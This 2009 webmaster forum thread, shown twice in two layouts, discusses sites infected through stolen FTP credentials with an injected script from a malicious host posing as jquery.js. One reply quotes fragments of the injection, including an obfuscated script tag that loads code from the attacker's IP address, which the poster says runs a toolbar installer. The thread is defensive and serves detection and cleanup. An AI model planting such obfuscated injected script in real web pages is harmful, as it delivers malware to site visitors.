seeing this fake jquery.js file...anyone else?

bDok · 2009-04-28, 03:19 AM

94.247.2.195/jquery.js

in the html source of the sites I'm seeing it as unescaped. In my activity window I see it resolving to actually 94.247.2.195/jquery.js. I just saw it on two submitters today. So I'm thinking possibly all their sites are infested with it. I don't believe it to be them. Most likely a weak link at some place in their setup. I'm going to send a message out to the submitters, but wondering if anyone else has seen this and how did they proceed.

I only noticed too because they sites were taking awhile to load. So I popped open the activity window. Ugh. I just can't imagine these submitters are actually going to fix all their freesites. So most likely I'll be trashing a bunch. Too bad too because they were pretty decent sites.

So yea. Anyone else see this yet? Now I feel I need to write some code to scan all my sites for document.write code in the html source. Fun for tomorrow at some point.

MadCat · 2009-04-28, 06:40 AM

I can't reach that site anymore or I'd take a look and see what's in there. It might also not be fake, jquery's a JS library for user interface stuff so someone might actually be using it. It's quite useful in that sense.

cd34 · 2009-04-28, 09:26 AM

That is an exploit added to html and javascript by FTP. If you are seeing that, then the submitter's FTP account has been accessed.

There are about 4 different incarnations of it -- all resulting in the same end result. You'll also want to check any php file for code like this embedded right before the <body tag

Code:

<?php if(!function_exists('tmp_lkojfghx')){

Code:

<script language=javascript><!-- 
document.write(unescape('uyN%3CsDLc0

And the jquery.js from that site contains

Code:

<s'+'cri'+'pt src="htt'+'p://94.2'+'47.2.1'+'95/ne'+'ws/?id=10KK"><'+'/scri'+'pt>

In addition to a bit of other stuff.

news checks to see if there is a cookie, if not, it runs a toolbar installer.

Tell the submitter to change their FTP password, run a scan on their machine for spyware/trojans/viruses, then change their FTP password again if they have found anything.

bDok · 2009-04-28, 11:00 AM

thanx cd34 for more info on it. I'm sending out emails today. Last night I disabled all the sites they currently had in the system once I saw this.

nate · 2009-04-28, 11:46 AM

http://safebrowsing.clients.google.c....195/jquery.js

Safe Browsing
Diagnostic page for 94.247.2.0

What is the current listing status for 94.247.2.0?

This site is not currently listed as suspicious.

What happened when Google visited this site?

Of the 276 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-04-27, and the last time suspicious content was found on this site was on 2009-04-27.

Malicious software includes 32870 scripting exploit(s), 20 trojan(s), 8 exploit(s).

This site was hosted on 1 network(s) including AS12553.

Has this site acted as an intermediary resulting in further distribution of malware?

Over the past 90 days, 94.247.2.0 appeared to function as an intermediary for the infection of 7 site(s) including ultimathulelodge.com/, zavallis.com/, databpo.com/.

Has this site hosted malware?

Yes, this site has hosted malicious software over the past 90 days. It infected 13612 domain(s), including serona.pe.kr/, hitzwallpaper.com/, firat.edu.tr/.

Next steps:

* Return to the previous page.
* If you are the owner of this web site, you can request a review of your site using Google Webmaster Tools. More information about the review process is available in Google's Webmaster Help Center.

Updated 3 hours ago

©2008 Google - Google Home

2009-04-28, 03:19 AM	#1
bDok bang bang Join Date: Mar 2005 Location: SD/OC/LA Posts: 3,241	seeing this fake jquery.js file...anyone else? 94.247.2.195/jquery.js in the html source of the sites I'm seeing it as unescaped. In my activity window I see it resolving to actually 94.247.2.195/jquery.js. I just saw it on two submitters today. So I'm thinking possibly all their sites are infested with it. I don't believe it to be them. Most likely a weak link at some place in their setup. I'm going to send a message out to the submitters, but wondering if anyone else has seen this and how did they proceed. I only noticed too because they sites were taking awhile to load. So I popped open the activity window. Ugh. I just can't imagine these submitters are actually going to fix all their freesites. So most likely I'll be trashing a bunch. Too bad too because they were pretty decent sites. So yea. Anyone else see this yet? Now I feel I need to write some code to scan all my sites for document.write code in the html source. Fun for tomorrow at some point. __________________ submit to Nymphotic submit to Moistlace

2009-04-28, 06:40 AM	#2
MadCat If something's hard to do, then it's not worth doing Join Date: Sep 2008 Location: Berlin, Germany Posts: 247	I can't reach that site anymore or I'd take a look and see what's in there. It might also not be fake, jquery's a JS library for user interface stuff so someone might actually be using it. It's quite useful in that sense. __________________ What's blue and not heavy?

2009-04-28, 09:26 AM	#3
cd34 a.k.a. Sparky Join Date: Sep 2004 Location: West Palm Beach, FL, USA Posts: 2,396	That is an exploit added to html and javascript by FTP. If you are seeing that, then the submitter's FTP account has been accessed. There are about 4 different incarnations of it -- all resulting in the same end result. You'll also want to check any php file for code like this embedded right before the <body tag Code: <?php if(!function_exists('tmp_lkojfghx')){ Code: <script language=javascript><!-- document.write(unescape('uyN%3CsDLc0 And the jquery.js from that site contains Code: <s'+'cri'+'pt src="htt'+'p://94.2'+'47.2.1'+'95/ne'+'ws/?id=10KK"><'+'/scri'+'pt> In addition to a bit of other stuff. news checks to see if there is a cookie, if not, it runs a toolbar installer. Tell the submitter to change their FTP password, run a scan on their machine for spyware/trojans/viruses, then change their FTP password again if they have found anything. __________________ SnapReplay.com a different way to share photos - iPhone & Android

2009-04-28, 11:00 AM	#4
bDok bang bang Join Date: Mar 2005 Location: SD/OC/LA Posts: 3,241	thanx cd34 for more info on it. I'm sending out emails today. Last night I disabled all the sites they currently had in the system once I saw this. __________________ submit to Nymphotic submit to Moistlace

2009-04-28, 11:46 AM	#5
nate I can now put whatever you want in this space :) Join Date: Mar 2009 Location: Merica! Posts: 543	http://safebrowsing.clients.google.c....195/jquery.js Safe Browsing Diagnostic page for 94.247.2.0 What is the current listing status for 94.247.2.0? This site is not currently listed as suspicious. What happened when Google visited this site? Of the 276 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-04-27, and the last time suspicious content was found on this site was on 2009-04-27. Malicious software includes 32870 scripting exploit(s), 20 trojan(s), 8 exploit(s). This site was hosted on 1 network(s) including AS12553. Has this site acted as an intermediary resulting in further distribution of malware? Over the past 90 days, 94.247.2.0 appeared to function as an intermediary for the infection of 7 site(s) including ultimathulelodge.com/, zavallis.com/, databpo.com/. Has this site hosted malware? Yes, this site has hosted malicious software over the past 90 days. It infected 13612 domain(s), including serona.pe.kr/, hitzwallpaper.com/, firat.edu.tr/. Next steps: * Return to the previous page. * If you are the owner of this web site, you can request a review of your site using Google Webmaster Tools. More information about the review process is available in Google's Webmaster Help Center. Updated 3 hours ago ©2008 Google - Google Home